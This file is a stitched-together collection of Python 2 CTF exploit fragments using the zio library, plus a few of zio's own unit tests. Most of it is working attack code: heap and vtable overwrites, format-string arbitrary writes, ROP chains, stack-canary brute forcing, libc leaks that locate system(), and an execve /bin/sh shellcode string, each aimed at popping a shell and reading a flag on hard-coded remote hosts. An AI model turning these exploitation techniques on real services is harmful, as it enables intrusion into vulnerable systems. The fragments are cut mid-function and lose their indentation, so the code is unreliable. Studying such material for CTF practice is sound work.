edit_item(io, 1, '222', '2'*0x10 + '3'*0x10 + '\xc2\x16\x60')# 覆盖第二个node->cleanup地址
# http://shell-storm.org/shellcode/files/shellcode-806.php
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
io.read_until('Quit\n')
io.writeline('4')
io.read_until(':')
io.writeline('2\x00' + shellcode)#激发第二个node->cleanup 并且把shellcode填入buffer
io.interact()
def test_tty_raw_out(self):
s = []
ans = []
for i in range(10):
r = random.randint(0,1)
s.append('%d%s' % (i, r and '\\r\\n' or '\\n'))
ans.append('%d%s' % (i, r and '\r\n' or '\n'))
ans = ''.join(ans)
cmd = "printf '" + ''.join(s) + "'"
io = zio(cmd, stdout = TTY_RAW)
rd = io.read()
io.close()
self.assertEqual(rd, ans)
unprintable = [chr(c) for c in range(256) if chr(c) not in string.printable]
for i in range(10):
random.shuffle(unprintable)
from zio import which
py = which('python2') or which('python')
self.assertNotEqual(py, None)
io = zio(' '.join([py, '-u', os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py'), "'\\r\\n" + repr(''.join(unprintable))[1:-1] + "\\n'"]), stdout = TTY_RAW, print_read = COLORED(REPR))
rd = io.read()
self.assertEqual(rd, "\r\n" + ''.join(unprintable) + "\n")
def exp2(target):
io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
add(io, 20, 8, 'a' * 0xa0)
add(io, 20, 8, 'a' * 0xa0)
add(io, 20, 8, 'a' * 0xa0)
delete(io, 0)
delete(io, 1)
add(io, 7, 8, "")
for i in range(7):
print i, hex(l64(show_row(io, 0, i)))
heap_base = l64(show_row(io, 0, 1)) - 0x50
main_base = l64(show_row(io, 0, 2)) - 0xb80
print hex(heap_base), hex(main_base)
delete(io, 0)
add(io, 20, 8, "")
libc_base = (l64(show_row(io, 0, 0))) - 0x3c4b78
print hex(libc_base)
system = libc_base + 0x0000000000045390
delete(io, 0)
add(io, 18, 8, '')
d1 = l64('/bin/sh;') - 0x0000000800000014
d = l64(d1)
for i in range(8):
val = ord(l64(system)[i]) - ord(l64(main_base + 0xcc0)[i])
if val < 0:
val += 0x100
d += chr(val)
expand(io, 0, 0x20000002, d)
add_row(io, 0, 22, 18)
add_row(io, 0, 25, 19)
payload = l32(0xdeadfafa) + l8(3) + l32(2) + l32(0)
io.write(payload)
io.writeline('./bin/cat flag/flag')
flag = io.readline()[:-1].strip()
print target
print 'flag', flag
submit_flag(flag)
io.close()
def exp(target):
# io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
io = zio(target, timeout=10000, print_read=COLORED(RAW, "red"), print_write=COLORED(RAW, "green"))
io.writeline("%17$p")
argv0 = int(io.readline().strip("\n"), 16)
io.writeline("%49$p")
path = int(io.readline().strip("\n"), 16)
print hex(path)
path = (path + 3) / 4 * 4
print hex(path)
index3 = (path - argv0) / 4 + 49
# not need
io.writeline("%49$s")
print HEX(io.readline().strip("\n"))
# not need
io.writeline("%%%d$p" % index3)
io.readline()
addr = 0x0804A01C
value = 0x41424344
for i in range(4):
do_fmt(io, "%%%dc%%17$hhn" % ((path + i) & 0xFF))
k = (addr >> (i * 8)) & 0xFF
if k != 0:
do_fmt(io, "%%%dc%%49$hhn" % k)
else:
do_fmt(io, "%%49$hhn")
do_fmt(io, "%%%dc%%17$hhn" % (path & 0xFF))
for i in range(4):
do_fmt(io, "%%%dc%%49$hhn" % ((addr + i) & 0xFF))
k = (value >> (i * 8)) & 0xFF
if k != 0:
do_fmt(io, "%%%dc%%%d$hhn" % (k, index3))
else:
do_fmt(io, "%%%d$hhn" % index3)
io.gdb_hint()
io.interact()
def test_attach_socket(self):
print ''
for _ in range(4):
port = random.randint(31337, 65530)
p = subprocess.Popen(['socat', 'TCP-LISTEN:%d,crlf' % port, 'SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; echo Hello, zio;"'])
time.sleep(0.2)
if p.returncode:
continue
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
line = ''
while True:
c = s.recv(1)
if not c:
break
else:
line += c
if line.find('\n') > -1:
break
assert line.rstrip() == "HTTP/1.0 200", repr(line)
io = zio(s)
line = io.readline()
self.assertEqual(line.rstrip(), "Content-Type: text/plain", repr(line))
line = io.readline()
line = io.readline()
self.assertEqual(line.rstrip(), "Hello, zio", repr(line))
io.end()
io.close()
except socket.error:
continue
p.terminate()
for _ in range(10):
r = p.poll()
if r is not None: break
time.sleep(0.2)
else:
try:
p.kill()
except:
pass
break
def a_byte(num):
global payload
address = 0
#while address <= 255:
for address in range(256):
io = zio((ip, port), timeout = 3, print_write = COLORED(REPR))
time.sleep(2)
io.read_until('>')
io.write('4')
io.read_until('(y/n) ')
io.write(payload + chr(address))
try:
io.readline()
data = io.readline()
if data != '':
payload += chr(address)
result = my_hex(address)
return result
address += 1
except TIMEOUT:
io.close()
continue
from zio import *
import random
target = ("pwnable.kr", 9009)
io = zio(target, timeout = 9999)
io.read_until("(Y/N)\n")
io.write("Y\n")
io.read_until("Choice: ")
io.write("1\n")
def read_timeout(io, timeout = 9999):
while True:
data = io.read_timeout(timeout)
if data.strip() != '':
continue
else:
return data
def get_status(data):
pos_s = data.find("Your Total is ") + len("Your Total is ")
pos_e = data.find("\n", pos_s)
my_value = int(data[pos_s:pos_e])
pos_s = data.find("The Dealer Has a Total of ") + len("The Dealer Has a Total of ")
pos_e = data.find("\n", pos_s)
dealer_value = int(data[pos_s:pos_e])
return my_value, dealer_value
def get_io(target): read_mode = COLORED(RAW, "green") write_mode = COLORED(RAW, "blue") io = zio(target, timeout = 9999)#, print_read = read_mode, print_write = write_mode) return io
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
'''
Created on 2014年11月29日
@author: yf
'''
from zio import *
import re
import time
io = zio('./qoobee4')#, print_write=False, print_read=False)
# io = zio(('10.11.12.13',1415), print_write=False, print_read=False)
lose_dic = ['scissor','rock','paper']
right_dic = ['paper', 'scissor','rock']
divset = [17, 16, 18, 19, 21, 22,23,24,25,26,27,28,29,30, 32 , 33 , 34 , 35 , 35 , 36 , 37 , 38 , 39 , 40]
rightset = []
flag = ''
def losenum(modnum):
return (modnum-1+3)%3
# def testdiv(modnum):
# # while True:
# io.read_until('Your Choice: ')
# io.writeline('7')
# io.read_until('Select one:')
# io.writeline('%d' % losenum(modnum))
# io.read_until('number(0-100)? ')
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from zio import *
ip = '210.61.8.96'
ip = '10.211.55.48'
port = 51342
io = zio((ip, port), timeout = 1000, print_write = COLORED(REPR))
open_plt = 0x8048420
flag = 0x80487D0
read_plt = 0x80483E0
buf = 0x0804A0A1
write_plt = 0x8048450
read_80_bytes = 0x804865C
gadget1 = 0x804879E
gadget2 = 0x804879D
pivot = 0x804867D
payload = ""
payload += '\x00'*108
payload += l32(read_80_bytes)
payload += l32(gadget1) # pop pop ret
payload += l32(buf) # read again
payload += l32(buf) # ebp <- buf
payload += l32(pivot) # mov esp, ebp
# fd = open("/home/rsbo/flag", 0);
payload += l32(0xdeadbeef)
#payload += l32(open_plt) + l32(flag) + l32(0)
from zio import *
io = zio("./main", timeout = 9999)
io.write("1111\x002222\x003333\n123123")
io.interact()
#!/usr/bin/env python2.7
#encoding:utf-8
from zio import *
import time
target = ('127.0.0.1',9979)
target = ('120.55.113.21',4799)
io = zio(target,timeout=5,print_read=COLORED(REPR,'cyan'),print_write=COLORED(REPR,'red'))
io.writeline('thatsme')
io.writeline()
time.sleep(0.5)
io.writeline('31')
io.read_until('吧')
io.readline()
q = io.readline()
q = q[:q.find('sum')-1].strip()
smps = {'1*2+3':10,'4-3+7':2,'9*3-5':4,'6+7*8':166,'15+3*8-7':255,'3*8+11+4':316}
io.writeline(str(smps[q]))
q = io.readline()
q = q[:q.find('sum')-1].strip()
io.writeline(str(smps[q]))
q = io.readline()
q = q[:q.find('sum')-1].strip()
io.writeline(str(smps[q]))
io.writeline()
time.sleep(0.5)
io.read_until(':)')
io.readline()
io.readline()
def get_io(target): io = zio(target, timeout = 9999) return io
def get_io(target):
r_m = False # COLORED(RAW, "green")
w_m = False # COLORED(RAW, "blue")
io = zio(target, timeout=5, print_read=r_m, print_write=w_m)
return io
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from zio import *
target = ('10.211.55.56', 12345)
io = zio(target, timeout=10000, print_read=COLORED(REPR,'yellow'),\
print_write=COLORED(REPR,'blue'))
io.read_until('Send block 0\n')
# encoding:utf-8
# 32位无NX, 覆盖BSS段函数指针
from zio import *
from pwn import *
func = 0x804A160
bss_data = 0x804A060
context(arch='i386', os='linux', log_level='debug')
io = zio(('101.200.187.112',9004),timeout = 9999,
#io = zio('./pwn1', timeout = 9999,
print_read = COLORED(RAW, 'green'), print_write = COLORED(RAW,'blue'))
io.read_until(':')
#io.gdb_hint(breakpoints= [0x08048600])
'''
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,%ebx
804806f: 89 c1 mov %eax,%ecx
def exploit(host):
io = None
try:
io = zio(host, timeout=1000, print_read=False, print_write=False)
if not io:
raise Exception
except:
print "can't caonnect server!"
exit(0)
def add_TV(name, Season, Rating, intro):
assert len(name) < 64 and len(Season) < 16 and len(Rating) < 16 and len(intro) < 128
io.read_until("Your choice?")
io.writeline("1")
io.writeline(name)
io.writeline(Season)
io.writeline(Rating)
io.writeline(intro)
def add_Movie(name, Actors, Rating, intro):
assert len(name) < 64 and len(intro) < 128
io.read_until("Your choice?")
io.writeline("2")
io.writeline(name)
io.writeline(Actors)
io.writeline(Rating)
io.writeline(intro)
def remove_obj(name):
io.read_until("Your choice?")
io.writeline("3")
io.writeline(str(name))
def show_all():
io.read_until("Your choice?")
io.writeline("4")
# leak heap base
def leak_heap():
return heap
# leak libc base
def leak_libc():
return libc
def write_TV_Vtable(vtable, mark=";/bin/sh;"):
vtable_str = ""
vtable_size = 0x60
tv_name = chr(vtable_size + 0x10 + 1)
for fn in vtable:
vtable_str += l64(fn)
vtable_str = vtable_str + "@" * (vtable_size - len(vtable_str) - len(mark)) + mark
# print vtable_str
assert len(vtable_str) == vtable_size
add_TV("00000000", "0", "0", "0" * 0x7F)
add_TV("11111111", "0", "0", "0" * 0x7F)
add_TV("22222222", "0", "0", "0" * 0x7F)
add_TV("33333333", "0", "0", "0" * 0x7F)
add_TV("33333333", "0", "0", "0" * 0x7F)
remove_obj("22222222")
remove_obj("11111111")
remove_obj("00000000")
remove_obj("33333333")
add_Movie("padding", "0" * 0xE0, "1", "0" * 0x7F)
# do not remove 'overwriting'
add_Movie("overwriting", vtable_str, "1", "1" * 0x7F)
# print "TV: {0}'s vtable has been overwrited!".format(tv_name)
return tv_name
def read_any_where_once(where):
p_nullstub = 0x0004012A0
p_printMovieInfo = 0x004011B0
tv_vtable = [p_printMovieInfo, p_nullstub, p_nullstub]
tv_name = write_TV_Vtable(vtable=tv_vtable)
floatnum = 0x0101010101010101
add_TV("leak_libc", "0", "0", l64(floatnum) + l64(where))
# trigger that tv_name will call p_printMovieInfo to leak info from address:where
show_all()
io.read_until("Movie <{0}>: ".format(tv_name))
result = io.read_until("actors: ")
result = io.readline().strip()
result = result.ljust(8, "\x00")
value = l64(result[0:8])
return value
# leak info
got_puts = 0x601C40
puts = read_any_where_once(got_puts)
print "[+] puts\t=>\t{0}".format(hex(puts))
libc_base = puts - 0x6FE30
print "[+] libc_base\t=>\t{0}".format(hex(libc_base))
system = libc_base + 0x46640
print "[+] system\t=>\t{0}".format(hex(system))
shot_shell = libc_base + 0x004652C
print "[+] shot_shell\t=>\t{0}".format(hex(shot_shell))
# fake vtable
p_nullstub = 0x0004012A0
p_printMovieInfo = 0x004011B0
tv_vtable = [shot_shell, shot_shell, shot_shell]
tv_name = write_TV_Vtable(tv_vtable)
# trigger that tv_name will call shot_shell
# remove_obj(tv_name)
show_all()
print "[+] shell open "
io.writeline("id")
io.interact()
buf = 0x804a058
pppr = 0x8048c0d
ppr = pppr + 1
pr = ppr + 1
recv_line = 0x8048744
send_len = 0x80487cc
send_str = 0x8048848
accept_plt = 0x80485c0
accept_got = 0x804a01c
accept_addr = 0xf0200
system_addr = 0x3ee80
system_accept_diff = system_addr - accept_addr
io = zio(target, print_write=False, print_read=COLORED(REPR, 'red'), timeout=9999999)
payload = 'A' * 268
rop_chain = [
# system()
buf,
0x44444444,
accept_plt,
# recv_line(), overwrite accept got
accept_got,
pr,
recv_line,
# sendlen(), get the got of accept
4,
#leak canary, rbp, ret_address
for x in range(3):
byte_by_byte()
log("----------result----------", 'blue')
log("canary: " + hex(canary_value), 'red')
log("save_rbp: " + hex(save_rbp), 'red')
log("ret_address: " + hex(ret_address), 'red')
#get libc_addr
log("----------get libc_addr----------", 'blue')
base_addr = ret_address - 0xe15
log("base_addr: " + hex(base_addr), 'red')
dprintf_got = 0x202040
log("dprintf_got: " + hex(dprintf_got), 'red')
fd = 0x4
io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR))
payload = "A"*8200 + l64(canary_value) + l64(save_rbp) + l64(base_addr+0xec6) + "A"*8 + l64(0x0) +\
"A"*8 + l64(base_addr+dprintf_got) + "A"*8 + l64(base_addr+dprintf_got) + l64(fd) +\
l64(base_addr+0xeb0)
io.write(payload)
io.read_until('thanks.\n')
dprintf_addr = l64(io.readline().ljust(8, '\x00'))
log("dprintf_addr: " + hex(dprintf_addr), 'red')
# # local
# dprintf_offset = 0x4E640
# system_offset = 0x3FF80
# binsh_offset = 0x14C28D
#server
